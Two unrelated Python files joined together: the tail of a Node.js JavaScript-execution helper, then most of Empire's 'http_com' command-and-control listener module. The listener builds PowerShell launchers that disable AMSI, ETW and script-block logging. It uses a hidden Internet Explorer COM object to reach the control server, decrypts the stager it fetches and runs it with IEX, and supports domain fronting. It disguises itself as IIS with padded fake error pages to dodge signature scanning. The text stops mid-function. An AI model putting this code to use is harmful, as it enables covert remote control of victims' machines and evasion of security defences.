stderr_buf.write(error_queue.get())
if process_finished() and error_queue.empty() and output_queue.empty():
finished = True
no_more_output.release()
no_more_error.release()
except OSError as e:
break
else:
while not process_finished() and tm.is_alive():
rready, wready, _ = select.select(rselect, wselect, [])
try:
if nodejs.stdin in wready:
b = stdin_buf.read(select.PIPE_BUF)
if b:
os.write(nodejs.stdin.fileno(), b)
for pipes in ((nodejs.stdout, stdout_buf), (nodejs.stderr, stderr_buf)):
if pipes[0] in rready:
b = os.read(pipes[0].fileno(), select.PIPE_BUF)
if b:
pipes[1].write(b)
except OSError as e:
break
tm.cancel()
stdin_buf.close()
stdoutdata = stdout_buf.getvalue()[:-len(PROCESS_FINISHED_STR) - 1]
stderrdata = stderr_buf.getvalue()[:-len(PROCESS_FINISHED_STR) - 1]
nodejs.poll()
if nodejs.poll() not in (None, 0):
if killed:
returncode = -1
else:
returncode = nodejs.returncode
else:
returncode = 0
# On windows currently a new instance of nodejs process is used due to problem with blocking on read operation on windows
if onWindows():
nodejs.kill()
return returncode, stdoutdata.decode('utf-8'), stderrdata.decode('utf-8')
def code_fragment_to_js(js, jslib=""):
# type: (Text, Text) -> Text
if isinstance(js, six.string_types) and len(js) > 1 and js[0] == '{':
inner_js = js
else:
inner_js = "{return (%s);}" % js
return u"\"use strict\";\n%s\n(function()%s)()" % (jslib, inner_js)
def execjs(js, # type: Text
jslib, # type: Text
timeout=None, # type: float
force_docker_pull=False, # type: bool
debug=False, # type: bool
js_console=False # type: bool
): # type: (...) -> JSON
fn = code_fragment_to_js(js, jslib)
returncode, stdout, stderr = exec_js_process(
fn, timeout=timeout, js_console=js_console, force_docker_pull=force_docker_pull, debug=debug)
if js_console:
if len(stderr) > 0:
_logger.info("Javascript console output:")
_logger.info("----------------------------------------")
_logger.info('\n'.join(re.findall(r'^[[](?:log|err)[]].*$', stderr, flags=re.MULTILINE)))
_logger.info("----------------------------------------")
def stdfmt(data): # type: (Text) -> Text
if "\n" in data:
return "\n" + data.strip()
return data
def fn_linenum(): # type: () -> Text
lines = fn.splitlines()
ofs = 0
maxlines = 99
if len(lines) > maxlines:
ofs = len(lines) - maxlines
lines = lines[-maxlines:]
return u"\n".join(u"%02i %s" % (i + ofs + 1, b) for i, b in enumerate(lines))
if returncode != 0:
if debug:
info = u"returncode was: %s\nscript was:\n%s\nstdout was: %s\nstderr was: %s\n" %\
(returncode, fn_linenum(), stdfmt(stdout), stdfmt(stderr))
else:
info = u"Javascript expression was: %s\nstdout was: %s\nstderr was: %s" %\
(js, stdfmt(stdout), stdfmt(stderr))
if returncode == -1:
raise JavascriptException(u"Long-running script killed after %s seconds: %s" % (timeout, info))
else:
raise JavascriptException(info)
try:
return json.loads(stdout)
except ValueError as e:
raise JavascriptException(u"%s\nscript was:\n%s\nstdout was: '%s'\nstderr was: '%s'\n" %
(e, fn_linenum(), stdout, stderr))
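# Usage sketch (assumes a working Node.js installation, or Docker with the
# node:slim image, as probed by new_js_proc above):
#
#     >>> execjs("1 + 1", jslib="")
#     2
#     >>> execjs("inputs.x.length", jslib="var inputs = {'x': [1, 2, 3]};")
#     3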
|
http_com.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import packets
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
    # this might not be necessary. Could probably be achieved by just calling mainMenu.get_db, but all the other
    # files have implemented it in place. Might be worthwhile to just make a database handling file.
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
"K") + '.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ie=New-Object -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl=14;"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
# add the RC4 packet to a header location
stager += "$c=\"%s: %s" % (requestHeader, b64RoutingPacket)
# Add custom headers if any
modifyHost = False
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
if headerKey.lower() == "host":
modifyHost = True
stager += "`r`n%s: %s" % (headerKey, headerValue)
stager += "\";"
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if modifyHost:
stager += helpers.randomize_capitalization(
"$ie.navigate2($ser,$fl,0,$Null,$Null);while($ie.busy){Start-Sleep -Milliseconds 100};")
stager += "$ie.navigate2($ser+$t,$fl,0,$Null,$c);"
stager += "while($ie.busy){Start-Sleep -Milliseconds 100};"
stager += "$ht = $ie.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $ie.document, $Null).InnerHtml;"
stager += "try {$data=[System.Convert]::FromBase64String($ht)} catch {$Null}"
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization(
"-join[Char[]](& $R $data ($IV+$" + helpers.generate_random_script_var_name("K") + ")) | IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
else:
print(helpers.color(
"[!] listeners/http_com generate_launcher(): invalid language specification: only 'powershell' is currently supported for this module."))
else:
print(helpers.color("[!] listeners/http_com generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
stagingKey = listenerOptions['StagingKey']['Value']
host = listenerOptions['Host']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http_com.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
            # Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
headers = ""
if customHeaders != []:
crlf = False
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# Host header TLS SNI logic done within http_com.ps1
if crlf:
headers += "`r`n"
else:
crlf = True
headers += "%s: %s" % (headerKey, headerValue)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
randomizedStager = ''
stagingKey = stagingKey.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
else:
print(helpers.color(
"[!] listeners/http_com generate_stager(): invalid language specification, only 'powershell' is current supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
# code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+b64DefaultResponse+'"')
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + str(b64DefaultResponse) + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
else:
print(helpers.color(
"[!] listeners/http_com generate_agent(): invalid language specification, only 'powershell' is currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
if(-not $IE) {
$Script:IE=New-Object -COM InternetExplorer.Application;
$Script:IE.Silent = $True
$Script:IE.visible = $False
}
else {
$Script:IE = $IE
}
""" % (listenerOptions['Host']['Value'])
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
$Headers = "%s: $RoutingCookie"
$script:Headers.GetEnumerator()| %%{ $Headers += "`r`n$($_.Name): $($_.Value)" }
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $Null, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
$html = $Script:IE.document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetProperty, $Null, $Script:IE.document, $Null).InnerHtml
try {
[System.Convert]::FromBase64String($html)
}
catch {$Null}
}
}
catch {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
""" % (listenerOptions['RequestHeader']['Value'])
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
$bytes=$e.GetBytes([System.Convert]::ToBase64String($RoutingPacket));
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
$Headers = ""
$script:Headers.GetEnumerator()| %{ $Headers += "`r`n$($_.Name): $($_.Value)" }
$Headers.TrimStart("`r`n")
try {
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$ServerURI = $Script:ControlServers[$Script:ServerIndex] + $taskURI
$Script:IE.navigate2($ServerURI, 14, 0, $bytes, $Headers)
while($Script:IE.busy -eq $true){Start-Sleep -Milliseconds 100}
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
else:
print(helpers.color(
"[!] listeners/http_com generate_comms(): invalid language specification, only 'powershell' is currently supported for this module."))
else:
print(helpers.color('[!] listeners/http_com generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
routingPacket = None
reqHeader = request.headers.get(listenerOptions['RequestHeader']['Value'])
if reqHeader and reqHeader != '':
try:
if reqHeader.startswith("b'"):
tmp = repr(reqHeader)[2:-1].replace("'", "").encode("UTF-8")
else:
tmp = reqHeader.encode("UTF-8")
routingPacket = base64.b64decode(tmp)
except Exception as e:
routingPacket = None
# pass
# if isinstance(results, str):
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(base64.b64encode(stage), 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
                                if b'not in cache' in results:
                                    # signal the client to restage
                                    print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 404)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(base64.b64encode(results), 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http_com')
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
try:
requestData = base64.b64decode(request.get_data())
except:
requestData = None
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
encrypted_agent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(base64.b64encode(encrypted_agent), 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
elif results == b'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results return by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http_com/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(base64.b64encode(results), 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
